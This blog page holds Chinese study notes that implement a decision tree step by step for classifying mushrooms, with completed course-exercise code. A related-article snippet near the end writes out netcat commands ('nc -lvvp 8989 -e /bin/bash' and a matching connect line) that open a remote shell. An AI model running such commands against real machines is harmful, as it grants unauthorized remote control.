机器学习随记(5)—决策树

news2024/11/25 1:03:50

手搓决策树:用决策树将其应用于分类蘑菇是可食用还是有毒的任务

温馨提示:下面为不完全代码,只是每个步骤代码的实现,需要完整跑通代码的同学不建议花时间看;适合了解决策树各个流程及代码实现的同学复习使用。


1 数据

1.1 one-hot编码数据集

1.2数据集:

X_train = np.array([[1,1,1],[1,0,1],[1,0,0],[1,0,0],[1,1,1],[0,1,1],[0,0,0],[1,0,1],[0,1,0],[1,0,0]])
y_train = np.array([1,1,0,0,1,0,0,1,1,0])
The shape of X_train is: (10, 3)
The shape of y_train is:  (10,)

10条数据,3个特征xi+1个目标y

2 计算熵

  • 计算𝑝1,这是可食用示例的一部分(即具有 value = in y
  • 然后计算熵:

 代码:

def compute_entropy(y):
    """
    Computes the entropy for 
    
    Args:
       y (ndarray): Numpy array indicating whether each example at a node is
           edible (`1`) or poisonous (`0`)
       
    Returns:
        entropy (float): Entropy at that node
        
    """
    # You need to return the following variables correctly
    entropy = 0.
    
    ### START CODE HERE ###
    if len(y) != 0:
        p1 = np.count_nonzero(y == 1)/len(y)
        if p1 != 0 and p1 != 1:
            entropy = -p1*np.log2(p1) - (1-p1)*np.log2(1-p1)
    ### END CODE HERE ###        
    
    return entropy

3 拆分数据集(分裂)

  • 该函数接收训练数据、该节点的数据点索引列表以及要拆分的特征。
  • 它拆分数据并返回左右分支的索引子集。
  • 例如,假设我们从根节点 (so node_indices = [0,1,2,3,4,5,6,7,8,9]) 开始,我们选择在特征上进行拆分0,即示例是否有棕色帽。
    • left_indices = [0,1,2,3,4,7,9]然后函数的输出是right_indices = [5,6,8]

split_dataset()下图所示的功能

  • 对于中的每个索引node_indices
    • X如果该特征在该索引处的值为1,则将该索引添加到left_indices
    • X如果该特征在该索引处的值为0,则将该索引添加到right_indices
def split_dataset(X, node_indices, feature):
    """
    Splits the data at the given node into
    left and right branches
    
    Args:
        X (ndarray):             Data matrix of shape(n_samples, n_features)
        node_indices (ndarray):  List containing the active indices. I.e, the samples being considered at this step.
        feature (int):           Index of feature to split on
    
    Returns:
        left_indices (ndarray): Indices with feature value == 1
        right_indices (ndarray): Indices with feature value == 0
    """
    
    # You need to return the following variables correctly
    left_indices = []
    right_indices = []
    
    ### START CODE HERE ###
    X_f = X[:,feature]
    for i in node_indices:
        if X_f[i] == 1:
            left_indices.append(i)
        elif X_f[i] == 0:
            right_indices.append(i)
    ### END CODE HERE ###
    return left_indices, right_indices

 4 计算信息增益

  • 𝐻(𝑝node1)是节点处的熵
  • 𝐻(𝑝left1) 和𝐻(𝑝right1)是由分裂产生的左分支和右分支的熵
  • 𝑤分别是左右分支的示例比例
def compute_information_gain(X, y, node_indices, feature):
    
    """
    Compute the information of splitting the node on a given feature
    
    Args:
        X (ndarray):            Data matrix of shape(n_samples, n_features)
        y (array like):         list or ndarray with n_samples containing the target variable
        node_indices (ndarray): List containing the active indices. I.e, the samples being considered in this step.
   
    Returns:
        cost (float):        Cost computed
    
    """    
    # Split dataset
    left_indices, right_indices = split_dataset(X, node_indices, feature)
    
    # Some useful variables
    X_node, y_node = X[node_indices], y[node_indices]
    X_left, y_left = X[left_indices], y[left_indices]
    X_right, y_right = X[right_indices], y[right_indices]
    
    # You need to return the following variables correctly
    information_gain = 0
    
    ### START CODE HERE ###
    
    # Weights 
    wl = len(X_left)/len(X_node)
    wr = len(X_right)/len(X_node)
    #Weighted entropy
    Hn = compute_entropy(y_node)
    Hl = compute_entropy(y_left)
    Hr = compute_entropy(y_right)
    #Information gain                                                   
    information_gain = Hn-(wl*Hl+wr*Hr)
    ### END CODE HERE ###  
    
    return information_gain

5 获得最佳划分(分裂)

get_best_split()如下所示的功能。

  • 该函数接收训练数据以及该节点的数据点索引
  • 函数的输出给出最大信息增益的特征
    • 您可以使用该compute_information_gain()函数迭代特征并计算每个特征的信息
def get_best_split(X, y, node_indices):   
    """
    Returns the optimal feature and threshold value
    to split the node data 
    
    Args:
        X (ndarray):            Data matrix of shape(n_samples, n_features)
        y (array like):         list or ndarray with n_samples containing the target variable
        node_indices (ndarray): List containing the active indices. I.e, the samples being considered in this step.

    Returns:
        best_feature (int):     The index of the best feature to split
    """    
    
    # Some useful variables
    num_features = X.shape[1]
    
    # You need to return the following variables correctly
    best_feature = -1
    gain_max = 0
    ### START CODE HERE ###
    for i in range(num_features):
        gain_ = compute_information_gain(X, y, node_indices, i)
        if gain_ > gain_max:
            gain_max = gain_
            best_feature = i
    ### END CODE HERE ##    
    return best_feature

6 构建树

在上面实现的函数来生成决策树,方法是连续选择最佳特征进行拆分,直到达到停止条件(最大深度为 2)。

tree = []

def build_tree_recursive(X, y, node_indices, branch_name, max_depth, current_depth):
    """
    Build a tree using the recursive algorithm that split the dataset into 2 subgroups at each node.
    This function just prints the tree.
    
    Args:
        X (ndarray):            Data matrix of shape(n_samples, n_features)
        y (array like):         list or ndarray with n_samples containing the target variable
        node_indices (ndarray): List containing the active indices. I.e, the samples being considered in this step.
        branch_name (string):   Name of the branch. ['Root', 'Left', 'Right']
        max_depth (int):        Max depth of the resulting tree. 
        current_depth (int):    Current depth. Parameter used during recursive call.
   
    """ 

    # Maximum depth reached - stop splitting
    if current_depth == max_depth:
        formatting = " "*current_depth + "-"*current_depth
        print(formatting, "%s leaf node with indices" % branch_name, node_indices)
        return
   
    # Otherwise, get best split and split the data
    # Get the best feature and threshold at this node
    best_feature = get_best_split(X, y, node_indices) 
    tree.append((current_depth, branch_name, best_feature, node_indices))
    
    formatting = "-"*current_depth
    print("%s Depth %d, %s: Split on feature: %d" % (formatting, current_depth, branch_name, best_feature))
    
    # Split the dataset at the best feature
    left_indices, right_indices = split_dataset(X, node_indices, best_feature)
    
    # continue splitting the left and the right child. Increment current depth
    build_tree_recursive(X, y, left_indices, "Left", max_depth, current_depth+1)
    build_tree_recursive(X, y, right_indices, "Right", max_depth, current_depth+1)
build_tree_recursive(X_train, y_train, root_indices, "Root", max_depth=2, current_depth=0)

(本示例问题来源Andrew NG 机器学习公开课)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/499566.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

MySQL锁机制

目录 表级锁&行级锁 排他锁&共享锁 InnoDB行级锁 行级锁(record lock): 间隙锁(gap lock): 意向锁 InnoDB表级锁 MVCC(多版本并发控制) 已提交读的MVCC&#xff1a…

Linux下的shell

NC反向shell 1、查看shell类型 echo $SHELLchsh -s 需要修改shell的类型cat /etc/shells 查看存在哪些shell 然后反弹对应的shell(正向连接) //被控制端 nc -lvvp 8989 -e /bin/bash //控制端 nc 192.168.222.146(被控端ip) 8989 2、没有-e参数反…

css链接悬停时滑动的下划线效果

要创建链接悬停时滑动的下划线效果,可以向锚点标记添加伪元素,并使用 CSS 过渡动画来显示它。 先看效果: 在提供的代码中,a::after 选择器创建了一个伪元素,该伪元素位于 a 标记后面。该伪元素具有绿色背景颜色和 1…

KVM 架构和部署

建议使用centos和ubuntu 系统做实验,rocky 系列有些不太支持 宿主机环境准备 KVM需要宿主机CPU必须支持虚拟化功能,因此如果是在vmware workstation上使用虚拟机做宿主机,那么必须要在虚拟机配置界面的处理器选项中开启虚拟机化功能。 验证…

【AI选股】如何通过python调用通达信-小达实现AI选股(量化又多了一个选股工具)

文章目录 前言一、通达信-小达是什么?二、使用步骤1. 引入browser_cookie3库2. 通达信-小达 AI选股源代码 总结 前言 ChatGPT火遍网络,那么有没有可以不用写公式就可以实现AI选股的方法?答案是有,今天我们就来试试通达信的小达&a…

软件测试面试常见问题【含答案】

一、面试技巧题(主观题) 序号面试题1怎么能在技术没有那么合格的前提下给面试官留个好印象?2面试时,如何巧妙地避开不会的问题?面试遇到自己不会的问题如何机智的接话,化被动为主动?3对于了解程度的技能,被…

鸿蒙学习总结

控件 button 源码所在路径,小编也只是猜测,还没搞懂鸿蒙上层app到底层的玩法,网上也没相关资料,找源码真是费劲(不是简单的下载个源码的压缩包,而是找到里面的控件比如Button,或者UIAbility实现的源码&…

探索qrc,rcc和CMAKE_AUTORCC

前导知识:解决qt中cmake单独存放 .ui, .cpp, .h文件 前言 我们的Qt程序可以加载一些资源,比如程序窗口的图标。 像下面这样的原始图标,很丑。 可以给它加上图标,一个小海豚。 一、直接加载资源 这是最简单直接的方式。 …

IntersectionObserver API实现虚拟列表滚动

前言 在本篇文章你将会学到: IntersectionObserver API 的用法,以及如何兼容。如何在React Hook中实现无限滚动。如何正确渲染多达10000个元素的列表。 无限下拉加载技术使用户在大量成块的内容面前一直滚动查看。这种方法是在你向下滚动的时候不断加…

keil MDK5软件包介绍、下载、安装与分享

前言 本文介绍了Keil MDK5软件包的分类、作用、下载、安装与更新。软件包下载可通过Keil自带的Pack Installer、进入Keil Pack下载网站手动下载、去芯片厂家官网下载三种方式。同时分享了一个小技巧,可以直接分享已安装好的软件包给别人。 一. Keil MDK软件包介绍 K…

《Netty》从零开始学netty源码(五十五)之InternalThreadLocalMap

InternalThreadLocalMap 前面介绍PoolThreadLocalCache中了解到netty的线程缓存变量值是存在InternalThreadLocalMap中的,它相对于java原生的map优点在于使用数组来管理变量值而不是map,它的数据结构如下: 在它的变量中与PoolThreadLocalCac…

springboot+vue在线BLOG网站(源码+文档)

风定落花生,歌声逐流水,大家好我是风歌,混迹在java圈的辛苦码农。今天要和大家聊的是一款基于springboot的在线BLOG网站闲一品交易平台。项目源码以及部署相关请联系风歌,文末附上联系信息 。 💕💕作者&…

我与猫头鹰的故事——得到学习的阶段总结

目录 一、背景二、过程三、总结四、升华 一、背景 记忆中已经模糊了加入得到的时间,但是现在它却成了我生活的一部分 每天就像有几位高人在给我细细道来他们的经验,给我前行的路上指引方向。 参与得到学习中不仅仅让我个人见识得到提升,最终…

Spring Cloud Gateway 限流

在高并发的应用中,限流是一个绕不开的话题。限流可以保障我们的 API 服务对所有用户的可用性,也可以防止网络攻击。 一般开发高并发系统常见的限流有:限制总并发数(比如数据库连接池、线程池)、限制瞬时并发数&#xf…

【C++】类和对象(初阶认识)#中篇#

上篇讲到对象的实例化 这里我们接着来探讨对象 目录 类域及成员函数在类域外的声明方法 内联 构造函数 先来看前三点: 无参调用格式 第四点函数重载 最后一点:没写构造时 自动生成 默认构造 并调用 《坑和补丁篇》 默认构造 析构函…

SETUNA2简介、下载和使用方法(截图贴图工具)

如果你在寻找一个可以截图并将截图置顶显示在桌面的工具,那么本文介绍的工具可以满足你的需求,但是我还是建议你移步: Snipaste介绍、安装、使用技巧(截图贴图工具)_西晋的no1的博客-CSDN博客 ,Snipaste工具…

Illustrator如何使用符号与图表之实例演示?

文章目录 0.引言1.使用Microsoft Excel数据创建图表2.修改图表图形及文字 0.引言 因科研等多场景需要进行绘图处理,笔者对Illustrator进行了学习,本文通过《Illustrator CC2018基础与实战》及其配套素材结合网上相关资料进行学习笔记总结,本文…

校园网自动登陆(河南科技学院)

1. 介绍 河南科技学院校园网自动登陆(新乡的很多系统相似,可能也可以用?),java版。可以实现电脑,路由器,软路由的自动认证wifi,后续会上传docker版本的。 源码地址 github:https://…

C嘎嘎的运算符重载基础教程以及遵守规则【文末赠书三本】

博主名字:阿玥的小东东 大家一起共进步! 目录 基础概念 优先级和结合性 不会改变用法 在全局范围内重载运算符 小结 本期送书:盼了一年的Core Java最新版卷Ⅱ,终于上市了 基础概念 运算符重载是通过函数重载实现的&#xf…

visual studio code安装c语言编译环境

目录 (一)Windows下安装GCC,下载并安装MinGW 安装MinGW 配置GCC环境变量 电脑使用CMD命令行输入 gcc -v ,查看gcc当前版本号以此判断gcc是否安装成功​编辑 (一)Windows下安装GCC,下载并安装MinGW 下载…